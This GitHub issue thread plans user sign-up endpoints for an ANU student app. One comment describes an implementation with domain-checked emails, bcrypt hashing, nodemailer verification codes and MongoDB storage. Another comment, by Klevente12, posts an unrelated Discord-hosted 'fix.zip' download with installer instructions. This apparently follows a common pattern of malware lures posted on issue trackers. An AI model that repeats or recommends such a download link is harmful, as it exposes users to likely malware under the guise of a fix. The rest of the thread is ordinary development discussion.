### ISSUE TITLE
User Sign Up and Registration

### ISSUE THREAD

**Issue by clevetong** [ANU-Student-Connect/student-connect-2024S2#49]
Create endpoints to enable new users to sign up and register.

**Criteria**:
1. When the user signs up, the backend should check whether the email has already been registered.
2. There should be a mechanism to check whether the user email is from the ANU domain.  
3. There should be a mechanism to send a verification code to the user's email and check its correctness.
4. Being able to send the new user's data to the database.

PS: Look into SSO e.g. OAuth

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by ahmadMusawi** [comment]
**Set Up User Sign-Up Endpoint:**

- I created a POST /auth/signup endpoint to allow users to register with the following fields:
- email: The email address used for registration. The system validates if it belongs to the ANU domain (u1234567@anu.edu.au or firstname.lastname@anu.edu.au). This was based on my observation of the ANU students and staff's email addresses. If there are other formats we can always include them.
- password: The user-provided password, which is securely hashed before being stored in the database using bcrypt.
- fullName: The user's full name.
- studentID: The ANU student ID.

**Email Validation:**

The code validates the provided email address to ensure it belongs to the ANU domain. If the email does not match the allowed format, the system returns an error.

**Password Hashing:**

The passwords are hashed securely usin bcrypt before saving them in the database.

**Email Verification:**

After the user is successfully registered, the system generates a verification code and sends it to the user's email address using nodemailer. The code is stored in the database alongside the user data to track the verification process.

**Database Integration:**

The user's details are stored in the MongoDB database under the Users Collection. This includes hashed passwords, ANU email addresses, student IDs, and verification codes.

**Error Handling:**

The code checks if the email is already registered and returns an appropriate error message if a duplicate registration is attempted.
Errors related to invalid email domains, missing fields, or server errors are all handled gracefully with descriptive error messages.
